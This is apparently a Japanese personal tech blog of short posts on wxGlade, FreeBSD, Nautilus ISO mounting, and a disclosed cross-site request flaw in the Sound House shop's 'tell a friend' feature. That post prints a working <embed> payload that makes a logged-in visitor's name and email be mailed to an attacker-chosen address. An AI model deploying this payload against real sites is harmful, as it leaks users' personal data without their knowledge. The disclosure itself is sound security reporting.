wxGlade on Python and wxPython
http://wxglade.sourceforge.net/
wxPythonでGUIを組むときは最初からコードを書いていたが、凝ったアプリでなければwxGladeを使ったほうが楽。
Sizer設置してGridSizer設置してレイアウトを構成する。
Event Handlerを指定すれば新しくイベント用関数が生成され、その後のGenerate codeでGUI部分に関係する差分だけ上書き処理される。すごいね。
今までとんでもない遠回りをしていた気がする。
FreeBSD on ThinkPad x61
サウンドハウスで今度は氏名ダダ漏れの可能性
http://www.soundhouse.co.jp/
http://www.itmedia.co.jp/news/articles/0804/07/news006.html
どんだけ脆弱なサイトなのかとチェックしていたら、メールアドレスと氏名が流出する可能性があることに気づいた。
サウンドハウスの「お友達に勧める」機能。
これを悪用すれば以前話題になったAmazonの「お友だちに知らせる」機能と同じようなことが起こるのでは。
方法
サウンドハウスにログインしている状態で以下のURLを踏むと、「ToAddr=」宛に自分の氏名・メールアドレスが送信される。
このURLを踏まなければ問題ないように思えるが、embed要素で悪意のあるサイトに埋め込んだら?
<embed src="http://www.soundhouse.co.jp/shop/TellaFriendSend.asp?ToAddr=xxx@gmail.com&Message=test&x=87&y=13&Item=1230%5E578603&Message1=" width="88" height="31">
試しにHTMLに埋め込んで表示してみると。こんなメールが届いた。
件名:○○○○ 様から、お勧めメールが届いています
差出人:メールアドレス
本文:test
ご案内致しました内容につきまして不明な点がございましたら、
弊社営業までご連絡頂きますようお願い致します。
”WEBシステム構成の再設計”を実行したらしいけど、どうも信用できないよサウンドハウス。
サウンドハウスのサイトを閉じる前には必ずログアウトを行うこと。
ちなみにembed要素はFirefoxにも対応してますよ。
プラグインの追加が表示されますが、バックグラウンドではsrc属性が展開されています。。。
Nautilusの便利な拡張
リポジトリを追加。
nautilus-mount-image
ISOイメージをマウントする。
$ apt-get install nautilus-mount-image
ISOイメージを右クリック、コンテキストメニューから「Mount image」でマウント。